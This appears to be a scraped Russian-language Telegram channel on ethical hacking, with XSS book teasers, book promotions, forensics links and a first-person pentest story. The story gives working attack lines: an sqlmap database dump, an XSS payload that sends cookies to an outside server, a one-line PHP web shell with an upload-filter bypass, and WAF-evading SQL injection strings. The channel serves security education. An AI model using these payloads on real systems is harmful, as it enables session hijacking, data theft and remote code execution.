Хакер | Этичный хакинг с Михаилом Тарасовым (Timcore)
1.65K subscribers
935 photos
50 videos
85 files
3.39K links
Обучение:

- Pentesting
- Социальная инженерия
- Проникновение
- Защита
- Работа с эксплойтами
- Аудит безопасности Обратная связь: admin@timcore.ru @timcore1
Download Telegram
#blog
#books
#xss

Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. DOM-based XSS: когда JavaScript сам себе враг

Если классический XSS — это атака на серверную часть, где неочищенный ввод пользователя возвращается через HTML, то DOM-based XSS переносит игру на новый уровень. Здесь зломышленник общается не с сервером, а с самим браузером и его JavaScript-кодом. Вся магия происходит уже после того, как пользователь загрузил страницу. Это современный, коварный, и зачастую невидимый для стандартных защит тип уязвимости. Добро пожаловать в адскую смесь легаси-джаваскрипта, фреймворков и client-side багов.

https://vk.com/@hacker_timcore-kniga-ve-ob-uyazvimosti-xss-glava-2-tipy-xss-znai-vraga-v-l
#quotes

«Успех в жизни - это невероятно скучное и рутинное занятие» © Михаил Тарасов (Timcore)
Эй, хакеры, кодеры и те, кто рвётся в мир эксплойтов! 🔥
Я — Михаил Тарасов (Timcore), и я решил прокачать Вашу библиотеку знаний. Бесплатно раздаю 9 своих авторских книг по хакингу, CTF, уязвимостям и программированию. Это не вода — это чистый хардкор: от SQL-инъекций до Rust-хаков. Хочешь прокачать скиллы и ломать системы как профи? Лови шанс, пока не поздно!

Вот что ты получишь в рассылке (PDF формат):

1. Capture the Flag (CTF). VulnHub 8 райтапов — Реальные walkthroughs для тренировок на VulnHub.
2. Cross Site Request Forgery — Как эксплуатировать CSRF и защищаться от него.
3. Программирование на Go для начинающих — Быстрый старт в Go для автоматизации.
4. Программирование на PHP8 для начинающих — Современный PHP для веб-эксплойтов.
5. Программирование на С для начинающих — База для low-level хаков.
6. Прохождение CTF Мистер Робот Практический курс — Шаг за шагом по легендарному CTF.
7. Уязвимость SQL-инъекция. Практическое руководство для хакеров — Эксплойты SQLi в действии.
8. Уязвимость-Cross-Site-Scripting-XSS-Практическое-руководство — XSS от А до Я, с примерами.
9. Хакинг на Rust — Безопасный и мощный Rust для пентеста.

Это не просто книги — это твои инструменты для доминирования в CTF, поиска уязвимостей и создания своих эксплойтов. Я написал их на основе реального опыта: ломал, фиксил, учил других. Бесплатно? Да, потому что знания должны быть доступны. Но только для тех, кто готов действовать!

Как забрать? по контакту в телеграм: @timcore1: "Хочу книги Timcore" — и я пришлю ссылку на скачивание. Не тяни, раздача ограничена!

#хакинг #CTF #эксплойты #программирование #Timcore
Поделись с друзьями — пусть все прокачаются! 🚀
#forensics

Сетевой потрошитель: как вскрыть трафик и увидеть всё, что лезет в твой интернет и из него

А, классика. Захотелось заглянуть под капот своему интернету и посмотреть, кто там кому шепчет? Похвальное стремление. Большинство пользователей воспринимают интернет как магию: ввел адрес — получил котиков. А то, что в это время их умный чайник отправляет отчет о ваших чаепитиях на китайский сервер, — дело десятое.
Что ж, садитесь поудобнее. Сейчас я выдам вам базовый набор юного сетевого потрошителя. Будем вскрывать цифровые потроха вашего подключения. Но сначала — минутка занудства, без которой моя совесть (и адвокат) не будут спать спокойно.

Подробнее: https://timforensics.ru/setevoj-potroshitel-kak-vskryt-trafik-i-uvidet-vsyo-chto-lezet-v-tvoj-internet-i-iz-nego/

Другие наши проекты:

https://timcore.ru/
https://timcourse.ru/
https://timforensics.ru/
https://tarasovinvest.ru/
https://mikhailtarasovcom.ru/
https://timrobot.ru/
https://timneuro.ru/

👨‍💻 vk.com/hacker_timcore - Образование для хакеров Junior, Middle.
🏫 vk.com/school_timcore - Школа этичного хакинга Timcore.
🤖 vk.com/programmer_timcore - Разработка роботов под заказ, готовые скрипты.
🎮 vk.com/timcore_games - Разработка игр.
🕵‍♂ vk.com/forensics_timcore - Услуги кибердетектива.
💰 vk.com/project_financing - Инвестиции (проектное финансирование).

Телеграм-каналы:
https://t.me/timcore_hacking
https://t.me/school_timcore
https://t.me/programmer_timcore
https://t.me/timneuro_timcore
https://t.me/mikhail_tarasov_finance

Будем рады видеть Вас в числе наших посетителей и подписчиков в представленных сайтах и пабликах вк.
#forensics

Кибер-Апокалипсис на заводе: форензика промышленных систем (ICS/SCADA)

Вы думали, что форензика — это только про изъятые ноутбуки из офисов и взломанные почтовые ящики? Какая наивность. Добро пожаловать в мир, где один неверный бит может остановить целый завод, обесточить город или превратить химкомбинат в локальный Чернобыль. Промышленные системы управления (ICS/SCADA) — это та самая критическая инфраструктура, о которой все говорят, когда упоминают кибервойны.

Подробнее: https://timforensics.ru/kiber-apokalipsis-na-zavode-forenzika-promyshlennyh-sistem-ics-scada/

Другие наши проекты:

https://timcore.ru/
https://timcourse.ru/
https://timforensics.ru/
https://tarasovinvest.ru/
https://mikhailtarasovcom.ru/
https://timrobot.ru/
https://timneuro.ru/

👨‍💻 vk.com/hacker_timcore - Образование для хакеров Junior, Middle.
🏫 vk.com/school_timcore - Школа этичного хакинга Timcore.
🤖 vk.com/programmer_timcore - Разработка роботов под заказ, готовые скрипты.
🎮 vk.com/timcore_games - Разработка игр.
🕵‍♂ vk.com/forensics_timcore - Услуги кибердетектива.
💰 vk.com/project_financing - Инвестиции (проектное финансирование).

Телеграм-каналы:
https://t.me/timcore_hacking
https://t.me/school_timcore
https://t.me/programmer_timcore
https://t.me/timneuro_timcore
https://t.me/mikhail_tarasov_finance

Будем рады видеть Вас в числе наших посетителей и подписчиков в представленных сайтах и пабликах вк.
🔍 ДНЕВНИК ХАКЕРА | Как я взломал корпоративный сайт за 4 часа (под NDA, но расскажу) 💻🔥

Привет, банда! Сегодня история из моей практики — реальный аудит безопасности коммерческого проекта. Имена и домены не светлю (NDA жёстче, чем файрвол Cisco), но сценарий покажу во всей красе 😎.

🎯 Как всё началось: клиент в панике
Звонок в 10 утра: «У нас веб-приложение для финтеха, нужен срочный пентест перед запуском». Говорю: «Окей, давайте scope и доступ». Получаю staging-среду, логин-пароль от тестового аккаунта и напутствие: «Только не роняйте прод, пожалуйста» 😅 .

🔍 Разведка: первые 30 минут
Захожу на сайт — сразу включаю Burp Suite, ставлю на перехват всего трафика. Кликаю по функциям: регистрация, логин, профиль, транзакции. Смотрю на запросы — и тут БАЦ! Вижу параметр user_id=1234 в URL при открытии личного кабинета 👀.
Думаю: «Это же классический IDOR, ребят, вы серьёзно?». Меняю 1234 на 1235 — БАМ, открывается чужой профиль с данными карты, ФИО, балансом 💣. Скриншот, записал в блокнот — это уже Critical severity.

💀 Копаем глубже: SQL-инъекция как десерт
Дальше проверяю форму поиска транзакций. Ввожу ' OR 1=1-- в поле даты — сайт выдаёт ошибку MySQL с названием таблицы 😂. Запускаю SQLMap:

sqlmap -u "https://target.com/transactions?date=2025-01-01" --dbs --batch

За 10 минут дамплю список баз данных: users, payments, admin_logs. Думаю: «Админы, вы вообще про prepared statements слышали?»

🔐 XSS + Session Hijacking: комбо для красоты
Захожу в раздел «Комментарии к платежам». Закидываю туда

<script>document.location='http://myserver.com/?c='+document.cookie</script>

Обновляю страницу от имени админа (через тестовый доступ) — и вижу, как мой сервер получил сессионную куку 🍪. HttpOnly флага нет, Secure тоже. Красота! Теперь можно перехватить сессию реального юзера через XSS.

🚀 File Upload: шелл за 5 минут
Есть функция загрузки документов для верификации аккаунта. Пробую залить PHP-шелл вместо PDF :
1. Создаю shell.php

<?php system($_GET['cmd']); ?>

2. Переименовываю в shell.php.pdf — не прошло.
3. Меняю MIME-тип через Burp на application/pdf — PROFIT! Файл залился 🎉.
Открываю https://target.com/uploads/shell.php?cmd=whoami — получаю ответ от сервера. Доступ к системе есть 💻.

🛡 WAF bypass: потому что могу
На одном из этапов натыкаюсь на ModSecurity . Блочит стандартные SQL-пейлоады. Что делаю? Обфусцирую:

' uNiOn SeLeCt 1,2,3--

Или двойное кодирование:

%2527%20OR%201=1--

WAF пропускает — думаю: «Ну что за настройки из коробки, ребята» 😏.

📋 Финал: отчёт и рекомендации
Через 4 часа у меня список из 12 уязвимостей:
• 3 Critical (IDOR, SQL Injection, RCE через file upload) 🔥
• 5 High (XSS, Session Hijacking, CORS misconfiguration) ⚠️
• 4 Medium (информационные утечки, слабые пароли по дефолту) 📌

Собираю отчёт с PoC для каждой дыры, скриншотами и рекомендациями: «Используйте parameterized queries, проверяйте авторизацию на бэке, добавьте HttpOnly/Secure для кук». Отправляю клиенту. Ответ: «Мы в шоке. Спасибо, что не хакеры нашли первыми» 😅.

💡 Мораль: аудит — это не формальность
Каждый раз, когда кто-то говорит «у нас всё защищено», я вспоминаю этот кейс. OWASP Top 10 — это не миф, это реальность 2025 года. И да, если у вас нет пентеста перед запуском — вы просто ждёте, когда вас сломают 🚨.

P.S. Этот кейс под NDA, так что все детали обезличены. Но методология рабочая — можете тестировать на своих проектах (с разрешением, конечно) 😎🔥 .
Здравствуйте, дорогие друзья.

Внимание. Акция!!!
Скидка 57% на мою электронную книгу, которая называется: «Библия начинающего Этичного хакера».
Акция продлится 3 дня, с 29 октября, и по 31 октября включительно.

Объем: 2144 страницы
Цена: 1500 рублей.

🔐💻 Взломай свой путь к знаниям с «Библией начинающего этичного хакера»! 💻🔐
Дорогие друзья! Сегодня хочу поделиться с Вами книгой, которая станет Вашим верным спутником в мире кибербезопасности – «Библия начинающего Этичного хакера». Эта книга – настоящее сокровище для тех, кто мечтает стать защитником цифрового пространства.

📘 Почему эта книга должна оказаться на Вашей полке?

1⃣ Она разделена на 9 увлекательных глав, которые погружают Вас в каждый аспект этичного хакинга.
2⃣ Вы начнете с основ и постепенно перейдете к более сложным темам – от идеального старта до мастерства.
3⃣ Каждая глава содержит практические задания, которые помогут закрепить полученные знания.

🛠 Главы книги охватывают различные темы:
Основы сетей и их безопасности.
Освоение инструментов для тестирования безопасности.
Техники сканирования и анализа уязвимостей.
Социальная инженерия и методы противодействия.
Веб-приложения и их уязвимости.
Инцидентный менеджмент и реагирование на инциденты.
Юридические аспекты и этические нормы в этичном хакинге.

👩‍💻👨‍💻 Хакерство не всегда означает что-то незаконное. Этичные хакеры – это специалисты, которые используют свои навыки для улучшения безопасности и защиты информации.
Не упустите возможность обучиться искусству этичного хакинга и принять участие в гонке вооружений 21 века, где Вашим оружием будет знание! 🏁

Объем: 2144 страницы
Цена: 1500 рублей.

Более подробное содержание вот тут: https://timcore.ru/2024/02/15/moja-novaja-kniga-biblija-nachinajushhego-jetichnogo-hakera/

Для приобретения пишите по контакту в телеграм: @timcore1
#blog
#xss

Книга: «Все об уязвимости XSS». Глава 2: Типы XSS — Знай врага в лицо 👀. Blind XSS: играем в прятки с бэкенд-админом

Blind XSS — это та разновидность уязвимости, где ты закидываешь payload как крючок в темной воде и ждёшь, когда кто-то из бэкенда, модерации или саппорта случайно зацепится. В отличие от обычного XSS, здесь ты не видишь мгновенного триггера — атака срабатывает далеко от твоих глаз, часто спустя часы, дни, недели. Но когда она взрывается, ты получаешь доступ к тем, кто стоит за кулисами сайта: администраторам, сотрудникам службы поддержки, аналитику, внутренним системам. Это настоящая игра в прятки, где побеждает терпеливый и изобретательный.

https://vk.com/@-44038255-knigase-ob-uyazvimosti-xss-glava-2-tipy-xss-znai-vraga-v-l?subtype=primary
#blog
#xss

Книга: «Все об уязвимости XSS». Глава 3: Как работает XSS — Анатомия атаки 🔬 • Same Origin Policy и почему XSS его обходит как WAF на выходных

Same Origin Policy (SOP) — это фундамент веб-безопасности. Его суть: сайт может взаимодействовать только с ресурсами своего домена, схемы и порта. SOP — тот самый “забор” между разными веб-приложениями, не позволяющий читать и менять данные другого сайта. Но весь прикол XSS — в том, что он взрывает эти стены, как, прости господи, школьник, который нашёл дыру в заборе.

https://vk.com/@hacker_timcore-kniga-vse-ob-uyazvimosti-xss-glava-3-kak-rabotaet-xss-anatom
#blog
#go

🚀 Свой сканер директорий на Go: быстрее ffuf’а в 3 раза

Привет, хакеры! 💻 Устал ждать пока ffuf отсканирует 10 миллионов путей? Я написал свой directory scanner на Go и он в 3 раза быстрее ffuf’а при тех же настройках.

https://vk.com/@hacker_timcore-svoi-skaner-direktorii-na-go-bystree-ffufa-v-3-raza
#blog
#rust

🔥 Пишем высокоскоростной port scanner на Rust с async Tokio

Забудь про nmap, когда надо быстро. Rust + Tokio = сканим 65k портов за секунды, а не минуты.

💡 Зачем это вообще нужно?

Представь: тебе надо просканить пачку хостов на баг-баунти, а nmap тормозит как Win98 на Pentium II. Админы уже залатали дыру, пока ты ждал результатов. Rust с async I/O через Tokio делает конкурентные TCP-коннекты параллельно — без GIL, без тормозов, чисто турбо-режим.

https://vk.com/@hacker_timcore-pishem-vysokoskorostnoi-port-scanner-na-rust-s-async-tokio